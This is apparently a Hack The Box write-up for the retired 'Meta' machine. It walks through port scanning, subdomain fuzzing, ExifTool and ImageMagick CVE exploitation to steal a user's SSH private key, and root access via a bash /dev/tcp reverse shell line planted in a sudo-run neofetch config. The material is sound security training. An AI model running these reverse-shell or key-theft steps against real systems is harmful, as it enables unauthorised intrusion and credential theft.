3 minutes
Hackthebox Meta
Meta is a machine running Linux with a medium difficulty level. Since this machine has been retired, I have created a writeup for it.
Machine IP: 10.10.11.140
The first thing I did was scan the machine using nmap to discover open ports and services.
Nmap scan report for 10.10.11.140
Host is up (0.11s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 12:81:17:5a:5a:c9:c6:00:db:f0:ed:93:64:fd:1e:08 (RSA)
| 256 b5:e5:59:53:00:18:96:a6:f8:42:d8:c7:fb:13:20:49 (ECDSA)
|_ 256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://artcorp.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Next, I added the domain to the hosts file. After performing a directory brute force on the website and not finding anything, I attempted to brute force the subdomains using ffuf
.
A subdomain, dev01.artcorp.htb
, was found, so I added it to the hosts file. When I accessed the website, I found a web app called “MetaView” that can display metadata from uploaded images.
Knowing that the web app uses ExifTool, I exploited a remote code execution vulnerability (CVE-2021-22204) to gain a reverse shell.
www-data@meta:/dev/shm$ ./pspy64
2022/06/09 16:04:22 CMD: UID=0 PID=1 | /sbin/init
2022/06/09 16:05:01 CMD: UID=0 PID=18397 | /usr/sbin/CRON -f
2022/06/09 16:05:01 CMD: UID=0 PID=18396 | /usr/sbin/CRON -f
2022/06/09 16:05:01 CMD: UID=0 PID=18398 | /usr/sbin/CRON -f
2022/06/09 16:05:01 CMD: UID=1000 PID=18399 | /bin/bash /usr/local/bin/convert_images.sh
2022/06/09 16:05:01 CMD: UID=1000 PID=18400 | /bin/bash /usr/local/bin/convert_images.sh
2022/06/09 16:05:01 CMD: UID=0 PID=18402 | /bin/sh -c rm /tmp/*
2022/06/09 16:05:01 CMD: UID=0 PID=18401 | /bin/sh -c rm /tmp/*
2022/06/09 16:05:01 CMD: UID=1000 PID=18403 | pkill mogrify
I discovered a command executed repeatedly by the user thomas (UID 1000). When I opened the convert_images.sh
file, I found it contained several commands to convert images to PNG format. I checked the ImageMagick version used, which was 7.0.10-36, vulnerable to command injection (CVE-2020-29599). I used the following payload in poc.svg
to obtain the private key of the user thomas.
By moving the poc.svg
file to /var/www/dev01.artcorp.htb/convert_images/
, I could see the result in the directory /dev/shm/c
, which I had created beforehand. This result file was the id_rsa
private key for the user thomas. I just needed to transfer this file to my local machine and use it to log in via SSH.
me@nowhere:~/htb/meta$ ls -l id_rsa
-rw------- 1 me me 2590 Jun 9 13:26 id_rsa
me@nowhere:~/htb/meta$ ssh thomas@artcorp.htb -i id_rsa
Linux meta 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jun 9 11:47:48 2022 from 10.10.14.210
thomas@meta:~$ cat user.txt
[redacted]
After gaining access to the user, I used LinPeas.sh
to enumerate and found that the user thomas could execute the command neofetch
as root without a password.
I modified the file /home/thomas/.config/neofetch/config.conf
by adding a line containing a reverse shell command to my local machine:
bash -c 'bash -i >& /dev/tcp/[LOCAL_IP]/4444 0>&1'
I also changed the $XDG_CONFIG_HOME
environment variable to /home/thomas/.config
to ensure that the neofetch
command uses the configuration for the user thomas.
export XDG_CONFIG_HOME="$HOME/.config"
sudo neofetch "\"\""
Execute the neofetch
command to get a reverse shell as root.
Rooted!